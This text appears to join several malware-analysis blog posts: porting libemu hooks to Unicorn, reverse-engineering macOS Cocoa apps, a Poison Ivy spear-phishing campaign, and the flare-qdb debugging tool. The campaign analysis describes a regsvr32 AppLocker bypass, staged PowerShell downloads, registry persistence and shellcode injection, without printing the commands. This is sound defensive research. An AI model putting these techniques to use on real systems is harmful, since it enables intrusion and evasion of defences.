The major difference is that Unicorn does everything through an opaque uc_engine* handle, while libemu uses a series of structs such as emu, emu_cpu, and emu_memory:

In general, the emu and emu_memory structures are passed directly as arguments to API wrappers such as emu_cpu_get, emu_memory_get and the emu_memory_read/write functions. There is one common case of direct member access to the emu_cpu structure that requires some special attention. This structure gives the user direct read/write access to the emulator’s virtual processor and is commonly utilized by user code. Examples to support include:

The next task was to see if we could mimic the direct access to the emu_cpu elements as if they were static struct fields. Here we enter the world of C++ operator overloading.
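As a language-neutral illustration of the idea (the real shim uses C++ operator overloading, not Python), the effect we are after — plain field accesses like cpu.eax transparently forwarded to the engine's register read/write calls — can be sketched like this. The FakeEngine class stands in for Unicorn's uc_reg_read/uc_reg_write so the example is self-contained:

```python
class EmuCpuShim:
    """Illustrative analogue of the C++ shim: attribute accesses such as
    cpu.eax are intercepted and forwarded to the engine's register
    read/write calls, mimicking libemu's direct emu_cpu field access."""

    _REGS = ("eax", "ebx", "ecx", "edx", "esp", "ebp", "esi", "edi", "eip")

    def __init__(self, engine):
        # Bypass our own __setattr__ so "_engine" is stored normally.
        object.__setattr__(self, "_engine", engine)

    def __getattr__(self, name):
        if name in self._REGS:
            return self._engine.reg_read(name)
        raise AttributeError(name)

    def __setattr__(self, name, value):
        if name in self._REGS:
            self._engine.reg_write(name, value)
        else:
            object.__setattr__(self, name, value)


class FakeEngine:
    """Stand-in for the uc_engine handle so the sketch runs anywhere."""
    def __init__(self):
        self._regs = {}
    def reg_read(self, name):
        return self._regs.get(name, 0)
    def reg_write(self, name, value):
        self._regs[name] = value


cpu = EmuCpuShim(FakeEngine())
cpu.eax = 0x41414141          # routed through reg_write behind the scenes
print(hex(cpu.eax))           # -> 0x41414141
```

In the actual C++ shim, the same trick is done by overloading the assignment and conversion operators on proxy objects standing in for each emu_cpu field.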

With these tasks complete, porting existing code from libemu over to Unicorn should be a pretty straightforward task.

Figure 1 shows an initial test we put together that includes the Win32 environment, shim layer, several API hooks, and a hard-coded payload.

Figure 1: Initial test of the libemu Win32 environment and hooks running under Unicorn

With this working, the next stage was to try it out against a larger code base. Here we imported the userhooks.cpp from scdbg, an extension of the libemu sctest that includes some 250 API hooks. As it turns out, very few changes were required to get it working.

In Figure 2, we can see the results of testing it against a fairly complex shellcode that:

  • allocates virtual memory
  • copies code to the new alloc
  • creates a new thread
  • downloads an executable
  • checks the registry for the presence of Antivirus software

Note that while this shellcode would normally do process injection, scdbg handles it all inline for simplified analysis.

Figure 2: Complex shellcode running with hooks imported from scdbg

Another large feature to test was the scdbg debug shell. When testing software in an emulated environment, having interactive debug tools available is extremely handy.

Figure 3 shows an example of setting a breakpoint, single stepping, and examining memory of code running in the emulator.

Figure 3: Imported scdbg debug shell running with Unicorn Engine and libemu shim layer


In this article we took a quick look at the differences between the libemu and Unicorn emulators' APIs. This allowed us to create a shim layer to import legacy libemu code and use it with Unicorn largely unchanged.

Once the shim layer was in place, we next imported the libemu Win32 Environment so we could run it under Unicorn.

As a final test we ported several large portions of the scdbg project, which was originally written to run under libemu. Here our previous work allowed for the importation of scdbg's 250+ API hooks and debug shell to run under Unicorn with only minimal changes.

Overall the entire process went quite smoothly and should provide benefits for developers of libemu and/or Unicorn. If you would like to experiment for yourself you can download a copy of our test project here.

Introduction to Reverse Engineering Cocoa Applications

While not as common as Windows malware, there has been a steady stream of malware discovered over the years that runs on the OS X operating system, now rebranded as macOS. February saw three particularly interesting publications on the topic of macOS malware: a Trojan Cocoa application that sends system information including keychain data back to the attacker, a macOS version of APT28’s Xagent malware, and a new Trojan ransomware.

In this blog, the FLARE team would like to introduce two small tools that can aid in the task of reverse engineering Cocoa applications for macOS. In order to properly introduce these tools, we will lay a bit of foundation first to introduce the reader to some Apple-specific topics. Specifically, we will explain how the Objective-C runtime complicates code analysis in tools such as IDA Pro, and how to find useful entry points into a Cocoa application’s code where you can begin analysis.

If you find these topics fascinating or if you want to be better prepared to investigate macOS malware in your own environment, come join us for a two-day crash course on this topic that we will be teaching at Black Hat Asia and Black Hat USA this year.

Cocoa Application Anatomy

When we use the term “Cocoa application”, we are referring to an application that is built using the AppKit framework, which belongs to what Apple refers to as the Cocoa Application Layer. In macOS, applications are distributed in an application bundle, a directory structure made to appear as a single file containing executable code and its associated resources, as illustrated in Figure 1.  

Figure 1: Directory structure of iTerm application bundle

These bundles can contain a variety of different files, but all bundles must contain at least two critical files: Info.plist and an executable file residing in the MacOS folder. The executable file can be any file with execute permissions, even a Python or shell script, but it is typically a native executable. Mach-O is the native executable file format for macOS and iOS. The Info.plist file describes the application bundle, containing critical information the OS needs in order to properly load it. Plist files can be in one of three possible formats: XML, JSON, or a proprietary binary format called bplist. A handy utility named plutil is available in macOS that allows you to convert between formats, or simply pretty-print a plist file regardless of its format. The most notable key in the Info.plist file is the CFBundleExecutable key, which designates the name of the executable in the MacOS folder that will be executed. Figure 2 shows a snippet of the pretty-printed output from plutil for the iTerm application’s Info.plist file.

Figure 2: snippet from iTerm application’s Info.plist file
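The plist handling described above can be reproduced with Python's standard plistlib module, which reads and writes both the XML and bplist formats. The dictionary below mirrors real Info.plist keys, but the values are made up for illustration:

```python
import plistlib

# Minimal Info.plist-style dictionary; CFBundleExecutable names the
# Mach-O (or script) inside the bundle's MacOS folder. Values here are
# illustrative, not taken from a real bundle.
info = {
    "CFBundleExecutable": "iTerm",
    "CFBundleIdentifier": "com.example.demo",
}

# Serialize to Apple's binary plist (bplist) format...
blob = plistlib.dumps(info, fmt=plistlib.FMT_BINARY)
assert blob.startswith(b"bplist00")   # the bplist magic bytes

# ...and parse it back, much as plutil -p would pretty-print it.
parsed = plistlib.loads(blob)
print(parsed["CFBundleExecutable"])   # -> iTerm
```

plistlib.loads detects the format automatically, so the same call handles XML plists pulled from a bundle as well.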


Cocoa applications are typically written in Objective-C or Swift. Swift, the newer of the two languages, has been quickly catching up to Objective-C in popularity and appears to have overtaken it. Despite this, Objective-C has many years over Swift, which means the majority of malicious Cocoa applications you will run into will be written in Objective-C for the time being. Additionally, older Objective-C APIs tend to be encountered during malware analysis. This can be due to the age of the malware or for the purpose of backwards compatibility. Objective-C is a dynamic and reflective programming language and runtime. Roughly 10 years ago, Objective-C version 2.0 was released, which included major changes to both the language and the runtime. Where details are concerned, this blog is referring to version 2.0.

Programs written in Objective-C are transformed into C as part of the compilation process, making it at least a somewhat comfortable transition for most reverse engineers. One of the biggest hurdles to such a transition comes in how methods are called in Objective-C. Objective-C methods are conceptually similar to C functions; they are a unit of code that performs a specific task, optionally taking in parameters and returning a value. However, due to the dynamic nature of Objective-C, methods are not normally called directly. Instead, a message is sent to the target object. The name of a method is called a selector, while the actual function that is executed is called an implementation. The message specifies a reference to the selector that is to be invoked along with any method parameters. This allows for features like “method swizzling,” in which an application can change the implementation for a given selector. The most common way in which messages are sent within Objective-C applications is the objc_msgSend function. Figure 3 provides a small snippet of Objective-C code that opens a URL in your browser. Figure 4 shows this same code represented in C.


Figure 3: Objective-C code snippet



Figure 4: Objective-C code represented in C

As you can see, the Objective-C code between the brackets amounts to a call to objc_msgSend.
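The selector-based indirection described above can be modeled with a toy dispatch table in Python. This is purely illustrative — the real runtime is C and far more involved — but it captures why call sites reference selectors rather than functions, and why swizzling works:

```python
# Toy model of Objective-C messaging: a message names a selector, the
# runtime looks up the implementation (IMP) in a table, and "method
# swizzling" simply swaps the table entry. All names are illustrative.

class ToyRuntime:
    def __init__(self):
        self.imps = {}                      # selector -> implementation

    def register(self, selector, imp):
        self.imps[selector] = imp

    def objc_msgSend(self, receiver, selector, *args):
        # Dispatch is indirect: the call site references the selector,
        # never the implementing function itself.
        return self.imps[selector](receiver, *args)

rt = ToyRuntime()
rt.register("openURL:", lambda recv, url: "opening " + url)
print(rt.objc_msgSend(None, "openURL:", "http://example.com"))
# -> opening http://example.com

# Swizzle: replace the implementation behind the same selector.
rt.register("openURL:", lambda recv, url: "blocked " + url)
print(rt.objc_msgSend(None, "openURL:", "http://example.com"))
# -> blocked http://example.com
```

This is exactly the property that frustrates static cross-referencing: nothing in the call site points at the implementation directly.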

Unfortunately, this message sending mechanism causes problems when trying to follow cross-references for selectors in IDA Pro. While you can easily see all the cross-references for a given selector from any location where it is referenced, the implementations themselves are not called or referenced directly and so there is no easy way to jump from a selector reference to its implementation or vice-versa. Figure 5 illustrates this problem by showing that the only cross-reference to an implementation is in the __objc_const section of the executable, where the runtime stores class member data.

Figure 5: Cross-reference to an implementation

Of course, the information that links these selector references to their implementations is stored in the executable, and thankfully IDA Pro can parse this data for us. In the __objc_const section, a structure identified by IDA Pro as __objc2_meth has the definition illustrated in Figure 6.



Figure 6: __objc2_meth structure

The first field of this structure is the selector for the method. One of the cross-references to this field brings us to the __objc_selrefs section of the executable, where you can find the selector reference. Following the cross-references of the selector reference reveals any locations in the code where the selector is used. The third field of the structure points to the implementation of the selector, which is the function we want to analyze. What is left to do is simply use this data to create the cross-references. The first of the two tools we are introducing is an IDAPython script that does just that for x86_64 Mach-O executable files using Objective-C 2.0. This script is similar to older IDAPython scripts released by Zynamics; however, those scripts do not support the x86_64 architecture. Our script is available along with all of our other scripts and plugins for IDA Pro from our Github repo here. For each Objective-C method defined in the executable, the script patches the instructions that cross-reference its selector to reference the implementing function itself and creates a cross-reference from the referencing instruction to the implementation function. Using this script allows us to easily transition from a selector’s implementation to its references and vice-versa, as shown in Figure 7 and Figure 8.

Figure 7: Cross-references added for implementation

Figure 8: View selector’s implementation from its reference

There is a noteworthy shortcoming to this tool, however. If more than one class defines a method with the same name, there will only be one selector present in the executable. For now, the tool ignores these ambiguous selectors.
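For readers who want to experiment outside IDA Pro, the __objc2_meth layout from Figure 6 can be parsed from raw bytes with a few lines of Python. The pointer values below are hypothetical; on a real binary you would read the raw data of the __objc_const section:

```python
import struct

# __objc2_meth on x86_64 is three 8-byte pointers: the selector name
# pointer, the type-encoding string pointer, and the implementation
# pointer (the field the script follows to build cross-references).
METH_FMT = "<QQQ"
METH_SIZE = struct.calcsize(METH_FMT)   # 24 bytes per method entry

def parse_objc2_meths(blob):
    """Yield (sel_ptr, types_ptr, imp_ptr) tuples from raw method data,
    as it might be read out of the __objc_const section."""
    for off in range(0, len(blob) - METH_SIZE + 1, METH_SIZE):
        yield struct.unpack_from(METH_FMT, blob, off)

# Hypothetical raw data describing two methods.
data = struct.pack("<QQQQQQ",
                   0x100002000, 0x100003000, 0x100001500,
                   0x100002010, 0x100003008, 0x1000015A0)
for sel, types, imp in parse_objc2_meths(data):
    print(hex(sel), "->", hex(imp))
```

Walking these tuples and wiring selector references to the imp pointers is, in essence, what the IDAPython script automates.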

Cocoa Applications – Where to Begin Looking?

Another quandary with reverse engineering Cocoa applications, or any application built with an application framework, is determining where the framework’s code ends and the author’s code begins. With programs written in C/C++, the author’s code would typically begin within the main function of the program. While there are many exceptions to this rule, this is generally the case. For programs using the Cocoa Application template in Apple’s IDE, Xcode, the main function simply performs a tail jump into a function exported by the AppKit framework named NSApplicationMain, as shown in Figure 9.

Figure 9: A Cocoa application's main function

So where do we look to find the first lines of code written by the application’s author that would be executed? The answer to that question lies within NSApplicationMain. In summary, NSApplicationMain performs three important steps: constructing the NSApplication object, loading the main storyboard or nib file, and starting the event loop. The NSApplication object plays the important role of event and notification coordinator for the running application. NSApplicationMain looks for the name of this class in the NSPrincipalClass key in the Info.plist file of the application bundle. Xcode simply sets this key to the NSApplication class, but this class may be subclassed or reimplemented and the key overwritten. A noteworthy notification that is coordinated by the NSApplication object is NS‌Application‌Did‌Finish‌Launching‌Notification, which is designated as the proper time to run any application-specific initialization code the author may have. To handle this notification, the application may designate a delegate class that adheres to the NSApplicationDelegate protocol. In Objective-C, a protocol fills the role traditionally referred to as an interface in object-oriented parlance. The relevant method in this protocol for encapsulating initialization code is the application‌Did‌Finish‌Launching method. By default, Xcode creates this delegate class for you and names it AppDelegate. It even defines an empty applicationDidFinishLaunching method for the application developer to modify as desired. With all this information in hand, the best place to look for the initial code of most Cocoa applications is in a method named applicationDidFinishLaunching, as shown in Figure 10.

Figure 10: Search for applicationDidFinishLaunching method

If you find nothing useful, fall back to analyzing the main function. It is important to note that all of this information is specific to apps created using the Cocoa Application template in Xcode. Cocoa applications do not need to use NSApplicationMain; developers can write their own Cocoa application from scratch and implement their own version of NSApplicationMain.

Interface Builder and Nib Files

It was previously mentioned that one of the main responsibilities of NSApplicationMain is to load the main storyboard or nib file. “Nib” stands for NeXTSTEP Interface Builder, referring to the Interface Builder application that is a part of Xcode. Interface Builder allows developers to easily build graphical user interfaces and even wire their controls to variables and methods within their code using a graphical interface. As a developer builds GUIs with Interface Builder, graphs of objects are formed. An object graph is saved in XML format in a .xib file in the project folder. When the project is built, each object graph is serialized using the NSKeyedArchiver class and stored in Apple’s bplist format in a .nib file within the application bundle, typically under the Resources folder. Xcode writes the name of the main nib file to the application’s Info.plist file under the key NSMainNibFile. When an application loads a nib file, this object hierarchy is unpacked into memory and all the connections between various GUI windows, menus, controls, variables, and methods are established. This list of connections includes the connection between the application delegate and the NSApplication class. Storyboards were added to macOS in Yosemite. They enable the developer to lay out all of the application’s various views that will be shown to the user and specify their relationships. Under the hood, a storyboard is a directory containing nib files and an accompanying Info.plist file. The main storyboard directory is designated under the key NSMainStoryboardFile in the application’s Info.plist file.

This brings us to the other tool we would like to share, which is available from our Github repo here. The tool uses ccl_bplist to decode and deserialize a nib file and print out the list of connections defined within it. For each connection, it prints the label for the connection (typically a method or variable name) and the source and destination objects’ classes. Each object encoded by NSKeyedArchiver is assigned a unique numeric identifier value that is included in the output in parentheses. For GUI elements that have textual data associated with them, such as button labels, the text is included in the script output within brackets. With this information, one can determine the relationships between the code and the GUI elements. It is even possible to rewire the application, changing which functions handle different GUI events. Note that if a nib is not flattened, it will be represented as a directory that contains nib files, and you can run this tool on the keyedobjects.nib file located within it instead. For storyboards, you can run this tool on the various nib files present in the storyboard directory. Figure 11 shows the tool’s output when run on the MainMenu.nib file from the recently discovered MacDownloader threat shown in Figure 12. You may notice that the GUI text in the tool output does not match the GUI text in the screenshot. In this case, many of the GUI elements are altered at run-time in the code illustrated in Figure 13.


Figure 11: output for MacDownloader threat

Figure 12: MacDownloader's initial window

Figure 13: Code updating the text of buttons

The tool’s output shows that the author used the default delegate class AppDelegate provided by Xcode. The AppDelegate class has two instance variables for NSButton objects along with four instance variables for NSTextField objects. A selector named btnSearchAdware is connected to the same button with id (49) as the instance variable btnAction. This is likely an interesting function at which to begin analysis.
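To get a feel for how NSKeyedArchiver's UID-based referencing works under the hood, here is a small sketch using Python's standard plistlib, which models the same structures ccl_bplist decodes. The archive below is hand-built for illustration; it is not a real nib:

```python
import plistlib

# Minimal NSKeyedArchiver-style archive: objects live in the $objects
# array and are referenced by UID, which is how nib connections point
# at their source and destination objects. Contents are illustrative.
archive = {
    "$archiver": "NSKeyedArchiver",
    "$objects": ["$null", "btnAction", {"label": plistlib.UID(1)}],
    "$top": {"root": plistlib.UID(2)},
}
blob = plistlib.dumps(archive, fmt=plistlib.FMT_BINARY)

def resolve(archive, ref):
    """Follow a UID reference into the $objects table."""
    return archive["$objects"][ref.data]

loaded = plistlib.loads(blob)
root = resolve(loaded, loaded["$top"]["root"])   # the {"label": ...} dict
print(resolve(loaded, root["label"]))            # -> btnAction
```

A real nib adds class metadata and many more object types, but connection extraction boils down to walking exactly this kind of UID graph.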


We hope you have enjoyed this whirlwind tour of reverse engineering Cocoa applications. If you are interested in getting some more exposure to macOS internals and analysis tools, reverse engineering and debugging techniques, and real macOS malware found in the wild, then come hang out with us at Black Hat this year and learn more!

Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government


FireEye recently observed a sophisticated campaign targeting individuals within the Mongolian government. Targeted individuals that enabled macros in a malicious Microsoft Word document may have been infected with Poison Ivy, a popular remote access tool (RAT) that has been used for nearly a decade for key logging, screen and video capture, file transfers, password theft, system administration, traffic relaying, and more. The threat actors behind this attack demonstrated some interesting techniques, including:

  1. Customized evasion based on victim profile – The campaign used a publicly available technique to evade AppLocker application whitelisting applied to the targeted systems.
  2. Fileless execution and persistence – In targeted campaigns, threat actors often attempt to avoid writing an executable to the disk to avoid detection and forensic examination. The campaign we observed used four stages of PowerShell scripts without writing the payloads to individual files.
  3. Decoy documents – This campaign used PowerShell to download benign documents from the Internet and launch them in a separate Microsoft Word instance to minimize user suspicion of malicious activity.
Attack Cycle

The threat actors used social engineering to convince users to run an embedded macro in a Microsoft Word document that launched a malicious PowerShell payload.

The threat actors used two publicly available techniques, an AppLocker whitelisting bypass and a script to inject shellcode into the userinit.exe process. The malicious payload was spread across multiple PowerShell scripts, making its execution difficult to trace. Rather than being written to disk as individual script files, the PowerShell payloads were stored in the registry.   

Figure 1 shows the stages of the payload execution from the malicious macro.

Figure 1: Stages of payload execution used in this attack

Social Engineering and Macro-PowerShell Level 1 Usage

Targets of the campaign received Microsoft Word documents via email that claimed to contain instructions for logging into webmail or information regarding a state law proposal.

When a targeted user opens the malicious document, they are presented with the messages shown in Figure 2, asking them to enable macros.

Figure 2: Lure suggesting the user to enable Macros to see content

Bypassing Application Whitelisting Script Protections (AppLocker)

Microsoft’s application whitelisting solution, AppLocker, prevents unknown executables from running on a system. In April 2016, a security researcher demonstrated a way to bypass this using regsvr32.exe, a legitimate Microsoft executable permitted to execute in many AppLocker policies. The regsvr32.exe executable can be used to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument. This technique bypasses AppLocker restrictions and permits the execution of code within the SCT file.

We observed implementation of this bypass in the macro code to invoke regsvr32.exe, along with a URL passed to it which was hosting a malicious SCT file, as seen in Figure 3.

Figure 3: Command after de-obfuscation to bypass AppLocker via regsvr32.exe

Figure 4 shows the entire command line parameter used to bypass AppLocker.

Figure 4: Command line parameter used to bypass AppLocker

We found that the malicious SCT file invokes WScript to launch PowerShell in hidden mode with an encoded command, as seen in Figure 5.

Figure 5: Content of SCT file containing code to launch encoded PowerShell
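Recovering such an encoded command outside of PowerShell is straightforward: the -EncodedCommand argument is Base64 over the UTF-16LE bytes of the script. A minimal Python helper (the sample string below is ours, not the campaign's actual payload):

```python
import base64

def decode_powershell(encoded):
    """Decode a PowerShell -EncodedCommand argument: Base64-decode,
    then interpret the bytes as UTF-16LE text."""
    return base64.b64decode(encoded).decode("utf-16-le")

# Build a hypothetical encoded command and round-trip it.
sample = base64.b64encode(
    "Start-Process winword.exe".encode("utf-16-le")).decode()
print(decode_powershell(sample))   # -> Start-Process winword.exe
```

The same two-step decode applies at every layer of this attack where an encoded PowerShell string appears, including the registry-resident payloads described later.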

Decoding SCT: Decoy launch and Stage Two PowerShell

After decoding the PowerShell command, we observed another layer of PowerShell instructions, which served two purposes:

1.     There was code to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet. When the victim enables macros, they will see the decoy document shown in Figure 6. This document contains the content described in the spear phishing email.

Figure 6: Decoy downloaded and launched on the victim’s screen

2.     After launching the decoy document in the second winword.exe process, the PowerShell script downloads and runs another PowerShell script named f0921.ps1 as shown in Figure 7.

Figure 7: PowerShell to download and run decoy document and third-stage payload

Third Stage PowerShell Persistence

The third stage PowerShell script persistently stores an encoded PowerShell command as a base64 string in the HKCU:\Console\FontSecurity registry key. Figure 8 shows a portion of the PowerShell commands for writing this value to the registry.

Figure 8: Code to set registry with encoded PowerShell script

Figure 9 shows the registry value containing encoded PowerShell code set on the victims’ system.

Figure 9: Registry value containing encoded PowerShell script

Figure 10 shows that, using Start-Process, PowerShell decodes this registry value and runs the malicious code.

Figure 10: Code to decode and run malicious content from registry

The third stage PowerShell script also configures another registry value named HKCU\CurrentVersion\Run\SecurityUpdate to launch the encoded PowerShell payload stored in the HKCU:\Console\FontSecurity key. Figure 11 shows the code for these actions. This will execute the PowerShell payload when the user logs in to the system.

Figure 11: PowerShell registry persistence

Fourth Stage PowerShell Inject-LocalShellCode

The HKCU\Console\FontSecurity registry value contains the fourth stage PowerShell script, shown decoded in Figure 12. This script borrows from the publicly available Inject-LocalShellCode PowerShell script from PowerSploit to inject shellcode.

Figure 12: Code to inject shellcode

Shellcode Analysis

The shellcode has a custom XOR based decryption loop that uses a single byte key (0xD4), as seen in Figure 13.

Figure 13: Decryption loop and call to decrypted shellcode
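A single-byte XOR loop like this is trivial to replicate for static analysis. A minimal Python equivalent, using the key observed in the shellcode (the plaintext below is illustrative):

```python
def xor_decrypt(buf, key=0xD4):
    """Single-byte XOR decode matching the shellcode's decryption
    loop: each byte is XORed with the key 0xD4."""
    return bytes(b ^ key for b in buf)

# XOR with the same key is its own inverse, so encrypting and
# decrypting use the identical routine.
encrypted = xor_decrypt(b"poison ivy config")
print(xor_decrypt(encrypted))   # -> b'poison ivy config'
```

Applying this over the encrypted blob recovers the shellcode and its embedded Poison Ivy configuration for further inspection.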

After the shellcode is decrypted and run, it injects a Poison Ivy backdoor into the userinit.exe as shown in Figure 14.

Figure 14: Code injection in userinit.exe and attempt to access Poison Ivy related DAT files

In the decrypted shellcode, we also observed content and configuration related to Poison Ivy.  Correlating these bytes to the standard configuration of Poison Ivy, we can observe the following:

  • Active setup – StubPath
  • Encryption/Decryption key - version2013
  • Mutex name - 20160509                 

The Poison Ivy configuration dump is shown in Figure 15.

Figure 15: Poison Ivy configuration dump


Although Poison Ivy has been a proven threat for some time, the delivery mechanism for this backdoor uses recent publicly available techniques that differ from previously observed campaigns. Through the use of PowerShell and publicly available security control bypasses and scripts, most steps in the attack are performed exclusively in memory and leave few forensic artifacts on a compromised host.

FireEye HX Exploit Guard is a behavior-based solution that is not affected by the tricks used here. It detects and blocks this threat at the initial level of the attack cycle when the malicious macro attempts to invoke the first stage PowerShell payload. HX also contains generic detections for the registry persistence, AppLocker bypasses and subsequent stages of PowerShell abuse used in this attack.

FLARE Script Series: Querying Dynamic State using the FireEye Labs Query-Oriented Debugger (flare-qdb)


This post continues the FireEye Labs Advanced Reverse Engineering (FLARE) script series. Here, we introduce flare-qdb, a command-line utility and Python module based on vivisect for querying and altering dynamic binary state conveniently, iteratively, and at scale. flare-qdb works on Windows and Linux, and can be obtained from the flare-qdb github project.


Efficiently understanding complex or obfuscated malware frequently entails debugging. Often, the linear process of following the program counter raises questions about parallel or previous register states, state changes within a loop, or if an instruction will ever be executed at all. For example, a register’s value may not become interesting until the analyst learns it was an important input to a function that has already been executed. Restarting a debug session and cataloging the results can take the analyst out of the original thought process from which the question arose.

A malware analyst must constantly judge whether such inquiries will lend indispensable observations or extraneous distractions. The wrong decision wastes precious time. It would be useful to query malware state like a database, similar to the following:

SELECT eax, poi(ebp-0x14) FROM malware.exe WHERE eip = 0x401072

FLARE has devised a command-line tool to efficiently query dynamic state and more in a similar fashion. The following is a description of this tool with examples of how it has been used within FLARE to analyze malware, simulate new scenarios, and even solve challenges from the 2016 FLARE-On challenge.


Drawing heavily from vivisect, flare-qdb is an open source tool for efficiently posing sophisticated questions and obtaining simple answers from binaries. flare-qdb’s command-line syntax is as follows:

flareqdb "<cmdline>" -at <address> "<python>"

flare-qdb allows an analyst to execute a command line of their choosing, break on arbitrary program counter values, optionally check conditions, and display or alter program state with ad-hoc Python code. flare-qdb implements several WinDbg-like builtins for querying and modifying state. Table 1 lists a few illustrative example queries.

Experiment or Alteration


What two DWORD arguments are passed to kernel32!Beep? (WinDbg analog: dd)

-at kernel32.Beep "dd('esp+4', 2)"

Terminate if eax is null at 0x401072 (WinDbg analog: .kill)

-at-if 0x401072 eax==0 "kill()"

Alter ecx programmatically (WinDbg analog: r)

-at malwaremodule+0x102a "r('ecx', '(ebp-0x14)*eax')"

Alter memory programmatically

-at 0x401003 "memset('ebp-0x14', 0x2a, 4)"

Table 1: Example flare-qdb queries
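For readers without flare-qdb handy, the query model — break at a location, evaluate an expression against live state — can be illustrated with a toy Python tracer. This is an analogy only: flare-qdb drives a vivisect debuggee, not sys.settrace, and all names below are ours:

```python
import sys

def query_at(func, lineno, expr, *args):
    """Toy analogue of flare-qdb's -at: run func(*args), and each time
    execution reaches the given source line, evaluate expr against the
    frame's local variables and record the result."""
    results = []
    def tracer(frame, event, arg):
        if event == "line" and frame.f_lineno == lineno:
            results.append(eval(expr, {}, frame.f_locals))
        return tracer   # keep receiving line events for this frame
    sys.settrace(tracer)
    try:
        func(*args)
    finally:
        sys.settrace(None)
    return results

def target(n):                # pretend this is the debuggee
    total = 0
    for i in range(n):
        total += i            # "breakpoint" on this line
    return total

# Query the value of i each time the loop body line is hit.
hits = query_at(target, target.__code__.co_firstlineno + 3, "i", 3)
print(hits)   # -> [0, 1, 2]
```

The appeal is the same as with flare-qdb: the question ("what is i at this line?") is posed once, up front, and answered in bulk without an interactive stepping session.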

Using the flareqdb Command Line

The usefulness of flare-qdb can be seen in cases such as loops dealing with strings. Figure 1 shows the flareqdb command line utility being used to dump the Unicode string pointed to by a stack variable for each iteration of a loop. The output reveals that the variable is used as a runner pointer iterating through argv[1].

Figure 1: Using flareqdb to monitor a string within a loop

Another example is challenge 4 from the 2016 FLARE-On Challenge (spoiler alert: partial solution presented below, full walkthrough is here).

In flareon2016challenge.dll, a decoded PE file contains a series of calls to kernel32!Beep that must be tracked in order to construct the correct sequence of calls to ordinal #50 in the challenge binary. Figure 2 shows a flareqdb one-liner that forwards each kernel32!Beep call to ordinal #50 in the challenge binary to obtain the flag.

Figure 2: Using flareqdb to solve challenge 4 of the 2016 FLARE-On Challenge

flareqdb can also force branches to be taken, evaluate function pointer values, and validate suspected function addresses by disassembling. For example, consider the subroutine in Figure 3, which is only invoked if a set of conditions is satisfied and which calls a C++ virtual function. Identifying this function could help the analyst identify its caller and discover what kind of data to provide through the command and control (C2) channel to exercise it.

Figure 3: Unidentified function with virtual function call

Using the flareqdb command-line utility, it is possible to divert the program counter to bypass checks on the C2 data that was provided and subsequently dump the address of the function pointer that is called by the malware at program counter 0x4029a4. Thanks to vivisect, flare-qdb can even disassemble the instructions at the resulting address to validate that it is indeed a function. Figure 4 shows the flareqdb command-line utility being used to force control flow at 0x4016b5 to proceed to 0x4016bb (not shown) and later to dump the function pointer called at 0x4029a4.

Figure 4: Forcing a branch and resolving a C++ virtual function call

The function pointer resolves to 0x402f32, which IDA has already labeled as basic_streambuf::xsputn as shown in Figure 5. This function inserts a series of characters into a file stream, which suggests a file write capability that might be exercised by providing a filename and/or file data via the C2 channel.

Figure 5: Resolved virtual function address

Using the flareqdb Python Module

flare-qdb also exists as a Python module that is useful for more complex cases. flare-qdb allows for ready use of the powerful vivisect library. Consider the logic in Figure 6, which is part of a privilege escalation tool. The tool checks GetVersionExW, NetWkstaGetInfo, and IsWow64Process before exploiting CVE-2016-0040 in WMI.

Figure 6: Privilege escalation platform check

It appears as if the tool exploits 32-bit Windows installations with version numbers 5.1+, 6.0, and 6.1. Figure 7 shows a script to quickly validate this by executing the tool 12 times, simulating different versions returned from GetVersionExW and NetWkstaGetInfo. Each time the script executes the malware, it indicates whether the malware reached the point of attempting the privilege escalation or not. The script passes a dictionary of local variables to the Qdb instance for each execution in order to permit the user callback to print the friendly name of each Windows version it is simulating for the binary. The results of GetVersionExW are modified prior to return using the vstruct definition of the OSVERSIONINFOEXW; NetWkstaGetInfo is fixed manually for brevity and in the absence of a definition corresponding to the WKSTA_INFO_100 structure.

Figure 7: Script to test version check

Figure 8 shows the output, which confirms the analysis of the logic from Figure 6.

Figure 8: Script output
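The gating logic as analyzed can be modeled in a few lines of Python. This is our reading of the check, not the malware's literal code; the version-tuple boundaries are an assumption drawn from the analysis above:

```python
def would_attempt_exploit(major, minor, is_64bit):
    """Model of the platform check: the tool targets 32-bit Windows
    with version 5.1+ (XP/2003), 6.0 (Vista/2008), or 6.1 (7/2008 R2).
    Boundaries reflect our analysis, not the binary's exact code."""
    if is_64bit:
        return False            # IsWow64Process check fails the target
    if major == 5 and minor >= 1:
        return True
    return (major, minor) in ((6, 0), (6, 1))

# Sweep simulated (version, bitness) combinations, as the Qdb script
# does by patching GetVersionExW / NetWkstaGetInfo return data.
for ver in ((5, 1), (6, 0), (6, 1), (6, 2), (6, 3), (10, 0)):
    for is64 in (False, True):
        print(ver, is64, would_attempt_exploit(*ver, is64))
```

Running the model over the same 12 combinations reproduces the pass/fail pattern seen in Figure 8.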

Next, consider an example in which the analyst must devise a repeatable process to unpack a binary and ascertain the locations of unpacked PE-COFF files injected throughout memory. The script in Figure 9 does this by setting a breakpoint relative to the tail call and using vivisect’s envi module to enumerate all the RWX memory locations that are not backed by a named file. It then uses flare-qdb’s park() builtin before calling detach() so that the binary runs in an endless loop, allowing the analyst to attach a debugger and resume manual analysis.

Figure 9: Unpacker script that parks its debuggee after unpacking is complete

Figure 10 shows the script announcing the locations of the self-injected modules before parking the process in an infinite loop and detaching.

Figure 10: Result of unpacker script

Attaching with IDA Pro via WinDbg as in Figure 11 shows that the program counter points to the infinite loop written in memory allocated by flare-qdb. The park() builtin stored the original program counter value in the bytes following the jmp instruction. The analyst can return the program to its original location by referring to those bytes and entering the WinDbg command r eip=1DC129B.

Figure 11: Attaching to the parked process
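The recovery command works because of how park() lays out its stub: a two-byte jmp $ (EB FE) followed by the saved program counter. A minimal sketch of that layout, assuming x86 and a little-endian DWORD immediately after the jump (the helper names are illustrative, not flare-qdb API):

```python
import struct

def build_park_stub(original_eip):
    """jmp $ (0xEB 0xFE) followed by the saved 32-bit program counter."""
    return b"\xeb\xfe" + struct.pack("<I", original_eip)

def recover_eip(stub):
    """What 'r eip=...' reconstructs: the DWORD after the 2-byte jmp."""
    return struct.unpack("<I", stub[2:6])[0]

stub = build_park_stub(0x1DC129B)  # value from the WinDbg session in Figure 11
print(hex(recover_eip(stub)))      # 0x1dc129b
```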

